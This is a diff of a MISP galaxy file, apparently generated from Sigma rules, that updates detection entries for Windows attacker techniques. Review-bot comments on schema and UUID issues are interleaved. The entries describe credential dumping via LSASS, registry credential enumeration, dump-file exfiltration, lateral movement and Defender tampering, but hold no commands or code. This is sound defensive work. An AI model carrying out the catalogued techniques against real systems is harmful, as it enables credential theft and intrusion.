+ "attack.lateral_movement",
+ "attack.t1021.002",
+ "attack.t1078"
+ ]
 },
+ "related": [
+ {
+ "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "d4498716-1d52-438f-8084-4a603157d131",
 "value": "Password Provided In Command Line Of Net.EXE"
 },
@@ -50972,8 +51700,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://businessinsights.bitdefender.com/deep-dive-into-a-backdoordiplomacy-attack-a-study-of-an-attackers-toolkit",
- "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11)",
 "https://www.documentcloud.org/documents/5743766-Global-Threat-Report-2019.html",
+ "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11)",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ldifde_export.yml"
 ],
 "tags": [
@@ -51086,9 +51814,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/samratashok/ADModule",
 "https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-enumeration-with-ad-module-without-rsat-or-admin-privileges",
 "https://twitter.com/cyb3rops/status/1617108657166061568?s=20",
+ "https://github.com/samratashok/ADModule",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_active_directory_module_dll_import.yml"
 ],
 "tags": [
@@ -51113,8 +51841,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70",
 "https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html",
+ "https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_susp_download_patterns.yml"
 ],
 "tags": [
@@ -51147,10 +51875,10 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://strontic.github.io/xcyclopedia/library/setres.exe-0E30E4C09637D7A128A37B59A3BC4D09.html",
- "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11)",
 "https://twitter.com/0gtweet/status/1583356502340870144",
 "https://lolbas-project.github.io/lolbas/Binaries/Setres/",
+ "https://strontic.github.io/xcyclopedia/library/setres.exe-0E30E4C09637D7A128A37B59A3BC4D09.html",
+ "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11)",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_setres.yml"
 ],
 "tags": [
@@ -51192,8 +51920,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment?slide=43",
- "https://github.com/carlospolop/PEASS-ng/blob/fa0f2e17fbc1d86f1fd66338a40e665e7182501d/winPEAS/winPEASbat/winPEAS.bat",
 "https://github.com/gladiatx0r/Powerless/blob/04f553bbc0c65baf4e57344deff84e3f016e6b51/Powerless.bat",
+ "https://github.com/carlospolop/PEASS-ng/blob/fa0f2e17fbc1d86f1fd66338a40e665e7182501d/winPEAS/winPEASbat/winPEAS.bat",
 "https://www.youtube.com/watch?v=JGs-aKf2OtU&ab_channel=OFFZONEMOSCOW",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_accesschk_check_permissions.yml"
 ],
@@ -51479,8 +52207,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md",
 "https://securelist.com/to-crypt-or-to-mine-that-is-the-question/86307/",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certmgr_certificate_installation.yml"
 ],
 "tags": [
@@ -51586,8 +52314,28 @@
 "https://twitter.com/an0n_r0/status/1474698356635193346?s=12",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_download_office_domain.yml"
 ],
- "tags": "No established tags"
+ "tags": [
+ "attack.command_and_control",
+ "attack.t1105",
+ "attack.t1608"
+ ]
 },
+ "related": [
+ {
+ "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "84771bc3-f6a0-403e-b144-01af70e5fda0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "00d49ed5-4491-4271-a8db-650a4ef6f8c1",
 "value": "Suspicious Download from Office Domain"
 },
@@ -51606,8 +52354,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec",
- "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html",
 "https://www.poweradmin.com/paexec/",
+ "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_psexec_paexec_escalate_system.yml"
 ],
 "tags": [
@@ -51640,8 +52388,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/Moriarty_Meng/status/984380793383370752",
 "https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OSBinaries/Powershell.yml",
+ "https://twitter.com/Moriarty_Meng/status/984380793383370752",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_run_script_from_input_stream.yml"
 ],
 "tags": [
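Review bot: `meta.tags` changes type in `@@ -51586,8 +52314,28 @@`, from the string sentinel `"No established tags"` to an array, and the same string-to-array flip happens for `proc_creation_win_susp_system_user_anomaly.yml`, `proc_creation_win_susp_progname.yml` and `proc_creation_win_hktl_crackmapexec_execution.yml` further down. The change itself is right, but as long as any other cluster still carries the sentinel, `tags` is sometimes a string and sometimes an array and every consumer has to branch on the type; emitting `"tags": []` (or omitting the key) for untagged rules would give the key a single type across the whole galaxy. That is again a generator-side fix. The two `related` entries added here appear to match the two technique tags (`attack.t1105`, `attack.t1608`), which is the convention the other hunks follow.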
@@ -51710,10 +52458,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://web.archive.org/web/20220224045756/https://www.ria.ee/sites/default/files/content-editors/kuberturve/tale_of_gamaredon_infection.pdf", "https://uvnc.com/docs/uvnc-viewer/52-ultravnc-viewer-commandline-parameters.html", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine", "https://unit42.paloaltonetworks.com/unit-42-title-gamaredon-group-toolset-evolution", + "https://web.archive.org/web/20220224045756/https://www.ria.ee/sites/default/files/content-editors/kuberturve/tale_of_gamaredon_infection.pdf", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ultravnc_susp_execution.yml" ], "tags": [ @@ -51747,8 +52495,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/JohnLaTwC/status/1082851155481288706", "https://app.any.run/tasks/f87f1c4e-47e2-4c46-9cf4-31454c06ce03", + "https://twitter.com/JohnLaTwC/status/1082851155481288706", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_susp_ps_appdata.yml" ], "tags": [ 
@@ -51847,9 +52595,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/windows/win32/secauthz/mandatory-integrity-control", - "https://cybercryptosec.medium.com/covid-19-cyber-infection-c615ead7c29", "https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/", + "https://cybercryptosec.medium.com/covid-19-cyber-infection-c615ead7c29", + "https://learn.microsoft.com/en-us/windows/win32/secauthz/mandatory-integrity-control", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_conhost_legacy_option.yml" ], "tags": [ @@ -51916,8 +52664,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://web.archive.org/web/20220514073704/https://github.com/ch2sh/Jlaive", "https://jstnk9.github.io/jstnk9/research/Jlaive-Antivirus-Evasion-Tool", + "https://web.archive.org/web/20220514073704/https://github.com/ch2sh/Jlaive", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_jlaive_batch_execution.yml" ], "tags": [ @@ -51950,10 +52698,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/ForensicITGuy/status/1334734244120309760", + "https://blog.osarmor.com/319/onenote-attachment-delivers-asyncrat-malware/", "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", - "https://blog.osarmor.com/319/onenote-attachment-delivers-asyncrat-malware/", + "https://twitter.com/ForensicITGuy/status/1334734244120309760", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmiprvse_susp_child_processes.yml" ], "tags": [ 
@@ -52003,10 +52751,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#inside-the-registry", - "https://github.com/synacktiv/Radmin3-Password-Cracker/blob/acfc87393e4b7c06353973a14a6c7126a51f36ac/regkey.txt", - "https://isc.sans.edu/diary/More+Data+Exfiltration/25698", "https://github.com/HyperSine/how-does-MobaXterm-encrypt-password", + "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#inside-the-registry", + "https://isc.sans.edu/diary/More+Data+Exfiltration/25698", + "https://github.com/synacktiv/Radmin3-Password-Cracker/blob/acfc87393e4b7c06353973a14a6c7126a51f36ac/regkey.txt", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_registry_enumeration_for_credentials_cli.yml" ], "tags": [ @@ -52095,8 +52843,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/jonasLyk/status/1555914501802921984", "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN", + "https://twitter.com/jonasLyk/status/1555914501802921984", "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntfs_short_name_use_image.yml" ], 
@@ -52140,41 +52888,6 @@ "uuid": "9082ff1f-88ab-4678-a3cc-5bcff99fc74d", "value": "HackTool - GMER Rootkit Detector and Remover Execution" }, - { - "description": "Detect creation of dump files containing the memory space of lsass.exe, which contains sensitive credentials.\nIdentifies usage of Sysinternals procdump.exe to export the memory space of lsass.exe which contains sensitive credentials.\n", - "meta": { - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", - "creation_date": "2019/10/24", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_susp_lsass_dump.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://eqllib.readthedocs.io/en/latest/analytics/210b4ea4-12fc-11e9-8d76-4d6bb837cda4.html", - "https://eqllib.readthedocs.io/en/latest/analytics/1e1ef6be-12fc-11e9-8d76-4d6bb837cda4.html", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_lsass_dump.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ] - }, - "related": [ - { - "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "related-to" - } - ], - "uuid": "ffa6861c-4461-4f59-8a41-578c39f3f23e", - "value": "LSASS Memory Dumping" - }, { "description": "Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708)", "meta": { 
@@ -52286,39 +52999,6 @@ "uuid": "24357373-078f-44ed-9ac4-6d334a668a11", "value": "Direct Autorun Keys Modification" }, - { - "description": "Detects a suspicious winrar execution that involves a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration", - "meta": { - "author": "Florian Roth (Nextron Systems)", - "creation_date": "2022/01/04", - "falsepositive": [ - "Legitimate use of WinRAR with a command line in which .dmp appears accidentally" - ], - "filename": "proc_creation_win_winrar_dmp.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winrar_dmp.yml" - ], - "tags": [ - "attack.collection", - "attack.t1560.001" - ] - }, - "related": [ - { - "dest-uuid": "00f90846-cbd1-4fc5-9233-df5c2bf2a662", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "related-to" - } - ], - "uuid": "1ac14d38-3dfc-4635-92c7-e3fd1c5f5bfc", - "value": "Winrar Compressing Dump Files" - }, { "description": "Detects commands that indicate a Raccine removal from an end system. Raccine is a free ransomware protection tool.", "meta": { 
@@ -52365,8 +53045,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1539/T1539.md#atomic-test-1---steal-firefox-cookies-windows", "https://blog.cyble.com/2022/04/21/prynt-stealer-a-new-info-stealer-performing-clipper-and-keylogger-activities/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1539/T1539.md#atomic-test-1---steal-firefox-cookies-windows", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sqlite_firefox_gecko_profile_data.yml" ], "tags": [ @@ -52409,10 +53089,10 @@ "logsource.product": "windows", "refs": [ "https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation", - "https://eqllib.readthedocs.io/en/latest/analytics/aed95fc6-5e3f-49dc-8b35-06508613f979.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-1---registry-dump-of-sam-creds-and-secrets", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md", + "https://eqllib.readthedocs.io/en/latest/analytics/aed95fc6-5e3f-49dc-8b35-06508613f979.html", "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_dumping_sensitive_hives.yml" ], "tags": [ 
@@ -52497,12 +53177,42 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://tools.thehacker.recipes/mimikatz/modules", "Internal Research", + "https://tools.thehacker.recipes/mimikatz/modules", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_system_user_anomaly.yml" ], - "tags": "No established tags" + "tags": [ + "attack.credential_access", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1134", + "attack.t1003", + "attack.t1027" + ] }, + "related": [ + { + "dest-uuid": "dcaa092b-7de9-4a21-977f-7fcb77e89c48", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "2617e7ed-adb7-40ba-b0f3-8f9945fe6c09", "value": "Suspicious SYSTEM User Process Creation" }, @@ -52519,8 +53229,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/", "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html", + "https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_gpg4win_susp_location.yml" ], "tags": [ 
@@ -52563,40 +53273,6 @@ "uuid": "7f43c430-5001-4f8b-aaa9-c3b88f18fa5c", "value": "Execute From Alternate Data Streams" }, - { - "description": "Detects using Diskshadow.exe to execute arbitrary code in text file", - "meta": { - "author": "Ivan Dyachkov, oscd.community", - "creation_date": "2020/10/07", - "falsepositive": [ - "False postitve can be if administrators use diskshadow tool in their infrastructure as a main backup tool with scripts." - ], - "filename": "proc_creation_win_lolbin_diskshadow.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration", - "https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_diskshadow.yml" - ], - "tags": [ - "attack.execution", - "attack.t1218" - ] - }, - "related": [ - { - "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "related-to" - } - ], - "uuid": "0c2f8629-7129-4a8a-9897-7e0768f13ff2", - "value": "Execution via Diskshadow.exe" - }, { "description": "Detects the execution of format.com with a suspicious filesystem selection that could indicate a defense evasion activity in which format.com is used to load malicious DLL files or other programs", "meta": { @@ -52610,8 +53286,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/wdormann/status/1478011052130459653?s=20", "https://twitter.com/0gtweet/status/1477925112561209344", + "https://twitter.com/wdormann/status/1478011052130459653?s=20", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_format.yml" ], "tags": [ 
@@ -52621,6 +53297,49 @@
 "uuid": "9fb6b26e-7f9e-4517-a48b-8cac4a1b6c60",
 "value": "Format.com FileSystem LOLBIN"
 },
+ {
+ "description": "Detects a suspicious LSASS process process clone that could be a sign of credential dumping activity",
+ "meta": {
+ "author": "Florian Roth (Nextron Systems), Samir Bousseaden",
+ "creation_date": "2021/11/27",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_lsass_process_clone.yml",
+ "level": "critical",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.matteomalvica.com/blog/2019/12/02/win-defender-atp-cred-bypass/",
+ "https://twitter.com/SBousseaden/status/1464566846594691073?s=20",
+ "https://twitter.com/Hexacorn/status/1420053502554951689",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lsass_process_clone.yml"
+ ],
+ "tags": [
+ "attack.credential_access",
+ "attack.t1003",
+ "attack.t1003.001"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "c8da0dfd-4ed0-4b68-962d-13c9c884384e",
+ "value": "Potential Credential Dumping Via LSASS Process Clone"
+ },
 {
 "description": "Detect the use of Windows Defender to download payloads",
 "meta": {
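Review bot: The new `description` contains a duplicated word, "a suspicious LSASS process process clone"; the intended text is presumably `"Detects a suspicious LSASS process clone that could be a sign of credential dumping activity"`. Because this file is generated from the upstream Sigma rule `proc_creation_win_lsass_process_clone.yml`, the correction has to be made upstream or it will be overwritten on the next sync. Note also that the entry tags both `attack.t1003` and its sub-technique `attack.t1003.001` and links both in `related`, so the cluster correlates to the parent technique as well as the child; that mirrors upstream and is not something to change here, but consumers deduplicating by technique should expect it.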
@@ -52634,8 +53353,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://web.archive.org/web/20200903194959/https://twitter.com/djmtshepana/status/1301608169496612866", "https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/", + "https://web.archive.org/web/20200903194959/https://twitter.com/djmtshepana/status/1301608169496612866", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_mpcmdrun_download.yml" ], "tags": [ @@ -52677,8 +53396,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/0gtweet/status/1674399582162153472", "https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/", + "https://twitter.com/0gtweet/status/1674399582162153472", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_provlaunch_susp_child_process.yml" ], "tags": [ @@ -52712,9 +53431,9 @@ "logsource.product": "windows", "refs": [ "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/smbexec.py", - "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/atexec.py", "https://www.elastic.co/guide/en/security/current/suspicious-cmd-execution-via-wmi.html", "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/wmiexec.py", + "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/atexec.py", "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/dcomexec.py", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_impacket_lateral_movement.yml" ], 
@@ -52744,6 +53463,40 @@
 "uuid": "10c14723-61c7-4c75-92ca-9af245723ad2",
 "value": "HackTool - Potential Impacket Lateral Movement Activity"
 },
+ {
+ "description": "Detects execution of WinRAR in order to compress a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration.",
+ "meta": {
+ "author": "Florian Roth (Nextron Systems)",
+ "creation_date": "2022/01/04",
+ "falsepositive": [
+ "Legitimate use of WinRAR with a command line in which \".dmp\" or \".dump\" appears accidentally",
+ "Legitimate use of WinRAR to compress WER \".dmp\" files for troubleshooting"
+ ],
+ "filename": "proc_creation_win_winrar_exfil_dmp_files.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winrar_exfil_dmp_files.yml"
+ ],
+ "tags": [
+ "attack.collection",
+ "attack.t1560.001"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "00f90846-cbd1-4fc5-9233-df5c2bf2a662",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "1ac14d38-3dfc-4635-92c7-e3fd1c5f5bfc",
+ "value": "Winrar Compressing Dump Files"
+ },
 {
 "description": "Detects the execution of regini.exe which can be used to modify registry keys, the changes are imported from one or more text files.",
 "meta": {
@@ -52757,8 +53510,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Regini/", "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://lolbas-project.github.io/lolbas/Binaries/Regini/", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regini", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regini_execution.yml" ], 
@@ -52812,6 +53565,45 @@ "uuid": "8e0bb260-d4b2-4fff-bb8d-3f82118e6892", "value": "Suspicious CMD Shell Output Redirect" }, + { + "description": "Detects execution of \"Diskshadow.exe\" in script mode using the \"/s\" flag where the script is located in a potentially suspicious location.", + "meta": { + "author": "Nasreddine Bencherchali (Nextron Systems)", + "creation_date": "2023/09/15", + "falsepositive": [ + "False positives may occur if you execute the script from one of the paths mentioned in the rule. Apply additional filters that fits your org needs." + ], + "filename": "proc_creation_win_diskshadow_script_mode_susp_location.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.zscaler.com/blogs/security-research/technical-analysis-crytox-ransomware", + "https://research.checkpoint.com/2022/evilplayout-attack-against-irans-state-broadcaster/", + "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow", + "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration", + "https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/", + "https://medium.com/@cyberjyot/lolbin-execution-via-diskshadow-f6ff681a27a4", + "https://www.lifars.com/wp-content/uploads/2022/01/GriefRansomware_Whitepaper-2.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_diskshadow_script_mode_susp_location.yml" + ], + "tags": [ + "attack.execution", + "attack.t1218" + ] + }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "fa1a7e52-3d02-435b-81b8-00da14dd66c1", + "value": "Diskshadow Script Mode - Execution From Potential Suspicious Location" + }, { "description": "Detects 
usage of bitsadmin downloading a file to uncommon target folder", "meta": { @@ -52904,9 +53696,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/electron/rcedit", - "https://security.stackexchange.com/questions/210843/is-it-possible-to-change-original-filename-of-an-exe", "https://www.virustotal.com/gui/file/02e8e8c5d430d8b768980f517b62d7792d690982b9ba0f7e04163cbc1a6e7915", + "https://security.stackexchange.com/questions/210843/is-it-possible-to-change-original-filename-of-an-exe", + "https://github.com/electron/rcedit", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_rcedit_execution.yml" ], "tags": [ @@ -52965,8 +53757,8 @@ "logsource.product": "windows", "refs": [ "https://www.virustotal.com/gui/search/content%253A%2522Set-MpPreference%2520-Disable%2522/files", - "https://docs.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps", "https://www.virustotal.com/gui/file/d609799091731d83d75ec5d1f030571af20c45efeeb94840b67ea09a3283ab65/behavior/C2AE", + "https://docs.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_defender_disable_feature.yml" ], "tags": [ 
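Review bot: The diskshadow coverage changes identity in `@@ -52812,6 +53565,45 @@`: the cluster removed in `@@ -52563,40 +53273,6 @@` (`Execution via Diskshadow.exe`, uuid `0c2f8629-7129-4a8a-9897-7e0768f13ff2`) does not come back, and its replacement `proc_creation_win_diskshadow_script_mode_susp_location.yml` carries a new uuid `fa1a7e52-3d02-435b-81b8-00da14dd66c1`. Any MISP event or correlation that was tagged with the old cluster value loses its galaxy link after this update, and the same applies to `LSASS Memory Dumping` (uuid `ffa6861c-4461-4f59-8a41-578c39f3f23e`) removed in `@@ -52140,41 +52888,6 @@`, which no visible hunk re-adds. If the generator supports it, a retired cluster is better kept with a deprecation marker than dropped; otherwise the removed uuids should at least be listed in the commit message so downstream operators can re-tag. Also worth a changelog line: the new rule is narrower (script mode via the `/s` flag from listed paths, `level` `medium`) than the deleted `high`-level rule it replaces, so detections previously attributed to the broad rule are not covered one-for-one.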
